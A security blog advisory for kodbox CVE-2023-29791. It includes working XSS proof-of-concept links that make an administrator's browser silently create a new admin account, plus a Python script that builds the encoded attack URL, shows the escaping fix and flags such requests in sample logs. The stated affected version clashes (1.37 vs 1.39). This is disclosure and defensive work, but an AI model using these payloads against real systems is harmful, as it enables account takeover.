CVE-2023-29791: kodbox xss - JunBlog
kodbox <= 1.37 is vulnerable to Cross Site Scripting (XSS) via the debug information.
English version
0x01 Vulnerability Description
A reflected XSS vulnerability caused by the debug information: the value of the `type` parameter of the admin/share/get route is echoed into the page without escaping.
0x02 Affected version
kodbox <= V1.39
0x03 Vulnerability reproduction
Triggering conditions
- CSRF protection is turned off
- Administrator privileges (both admin/share/get, the route that reflects the input, and admin/member/add, the route the chain abuses, are admin routes)
Steps to turn off CSRF protection
Desktop -> System settings -> Basic -> Security -> Enable CSRF protection (OFF)
Then construct the link that triggers the XSS. The `type` parameter is reflected into the page; the base64 in the data: URL decodes to <script>alert(/xss/)</script>:
http://target.com/?API_ROUTE=admin%2Fshare%2Fget&type=<embed%20src%3d"data%3atext%2fhtml%3bbase64%2c%20PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4%3d">
Next, build a PoC that adds an administrator. Because CSRF protection is off, a plain GET to admin/member/add is enough, so the request is sent through the src of an img tag. The `&` separators of the inner query are written as `%26` so that the outer query-string parser keeps them inside the `type` value; after that single decode the browser requests them as `&`. The account created has the name testuser, the nickname testu and the password testuser:
<img src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B%221%22%3A%221%22%7D%26sizeMax=0%26sizeUse=0" style='display:none'>
Full link; visit it while logged in as an administrator:
http://target.com/?API_ROUTE=admin/share/get&type=<img%20src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B"1"%3A"1"%7D%26sizeMax=0%26sizeUse=0"%20style=%27display:none%27>
An admin user is created successfully.
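The chain above, as an added example that is not part of the original post and not kodbox code: a small Python script that builds the two-layer URL, decodes it the way the two parties do (kodbox parses the outer query once, the browser then requests the reflected img src, which the server parses again), shows what goes wrong when the inner `&` is left raw, shows the escaping the debug output should apply before echoing `type`, and flags such requests in constructed access-log lines. It goes beyond the post's link in one respect: it percent-encodes the whole inner query a second time rather than only the `&` characters, so that the `"` characters of groupInfo also survive the first decode; in the post's full link those quotes are left raw, so the src attribute the browser sees ends at the first of them and groupInfo arrives truncated (the script dissects the post's link too to show this). The host target.example, the log lines and the account values are constructed; parameter names follow the request in the post.

```python
"""Two-layer encoding of the kodbox reflected-XSS -> add-admin chain, plus a
log check. Added example, not code from the original post or from kodbox; the
host target.example, the account values and the log lines are constructed."""
import html
import re
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# Characters kept literal in the outer `type` value, so the URL reads like the
# post's and, for the naive variant, a raw '&' can be shown splitting the query.
OUTER_SAFE = '/:?=&<>"%'

# The post's own full link, for comparison (quotes inside groupInfo left raw).
POST_LINK = ('http://target.com/?API_ROUTE=admin/share/get&type=<img%20src="/?API_ROUTE='
             'admin/member/add%26name=testuser%26nickName=testu%26password=testuser'
             '%26addMore=base%26roleID=3%26groupInfo=%7B"1"%3A"1"%7D%26sizeMax=0'
             '%26sizeUse=0"%20style=%27display:none%27>')


def inner_request(name, nickname, password, role_id=3):
    """Path+query of the admin/member/add call the victim's browser will send.
    Parameter names follow the post; roleID=3 is the value it uses for admin."""
    params = {"API_ROUTE": "admin/member/add", "name": name, "nickName": nickname,
              "password": password, "addMore": "base", "roleID": str(role_id),
              "groupInfo": '{"1":"1"}', "sizeMax": "0", "sizeUse": "0"}
    return "/?" + urlencode(params)


def chain_url(target, inner, double_encode=True):
    """Put `inner` in a hidden <img> inside the reflected `type` parameter.

    double_encode=True percent-encodes the inner query once more ('&' -> %26,
    '%' -> %25): the outer parser then sees a single `type` value, and after
    its one decode the browser still requests a well-formed src.
    double_encode=False leaves the inner '&' raw, so the outer parser splits
    the inner query into top-level parameters and the <img> is cut short."""
    src = quote(inner, safe="/?=") if double_encode else inner
    img = '<img src="%s" style=\'display:none\'>' % src
    return target + "/?API_ROUTE=admin/share/get&type=" + quote(img, safe=OUTER_SAFE)


def dissect(url):
    """Decode the URL as the two parties do: the outer query as kodbox parses
    it (one decode), then the src of the reflected <img> as the browser would
    request it, parsed again server-side."""
    outer = parse_qs(urlsplit(url).query)
    reflected = outer.get("type", [""])[0]
    m = re.search(r'src="([^"]*)"', reflected)  # attribute ends at the first '"'
    inner = parse_qs(urlsplit(m.group(1)).query) if m else {}
    return {"outer_params": sorted(outer), "reflected": reflected,
            "inner": {k: v[0] for k, v in inner.items()}}


def safe_reflect(value):
    """What the debug output should do before echoing `type` into HTML:
    entity-encode it, so the <img> is shown as text instead of being parsed."""
    return html.escape(value, quote=True)


# Constructed combined-format access-log lines (not real kodbox logs).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2023:10:00:01 +0000] "GET /?API_ROUTE=admin/share/get&type=<img%20src=%22/?API_ROUTE=admin/member/add%26name=x%22> HTTP/1.1" 200 512
10.0.0.6 - - [01/Apr/2023:10:00:02 +0000] "GET /?API_ROUTE=admin/share/get&type=file HTTP/1.1" 200 512
10.0.0.7 - - [01/Apr/2023:10:00:03 +0000] "GET /?API_ROUTE=explorer/list/path&path=%2F HTTP/1.1" 200 512
10.0.0.8 - - [01/Apr/2023:10:00:04 +0000] "GET /?API_ROUTE=admin%2Fshare%2Fget&type=%3Cembed%20src%3Ddata:text/html;base64,PHNj HTTP/1.1" 200 512
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_requests(log_text):
    """Client IPs of requests to admin/share/get whose `type` parameter decodes
    to something containing a tag character; decoding first catches both a raw
    '<' and %3C, and both spellings of the route."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = parse_qs(urlsplit(m.group(1)).query)
        route = q.get("API_ROUTE", [""])[0]
        if route == "admin/share/get" and re.search(r"[<>]", q.get("type", [""])[0]):
            hits.append(line.split()[0])
    return hits


if __name__ == "__main__":
    url = chain_url("http://target.example", inner_request("testuser", "testu", "testuser"))
    print(url)
    print(dissect(url)["inner"])
    print(dissect(POST_LINK)["inner"]["groupInfo"])  # the post's link: src cut at '{'
    print(flag_requests(SAMPLE_LOG))
```

Run stand-alone it prints the generated link, the parameters the server would receive from the nested request, the truncated groupInfo value that the post's own link yields, and the two log lines the detector flags. The detector decodes the query before matching on purpose: matching the raw request line on `<` alone would miss `%3C`, and matching on `admin/share/get` alone would miss the `admin%2Fshare%2Fget` spelling used in the first PoC link.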
- Author: Juneha
- Link: https://blog.mo60.cn/index.php/archives/kodbox-xss.html
- Copyright: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0.
- Disclaimer: The programs (methods) in this article may be offensive in nature and are provided for security research and teaching only. Readers who use the information for any other purpose bear full legal and joint liability; the author bears none. The author firmly opposes using the content of this article for malicious attacks and recommends that readers use their understanding of the technical principles to better protect personal information, enterprise security and national security.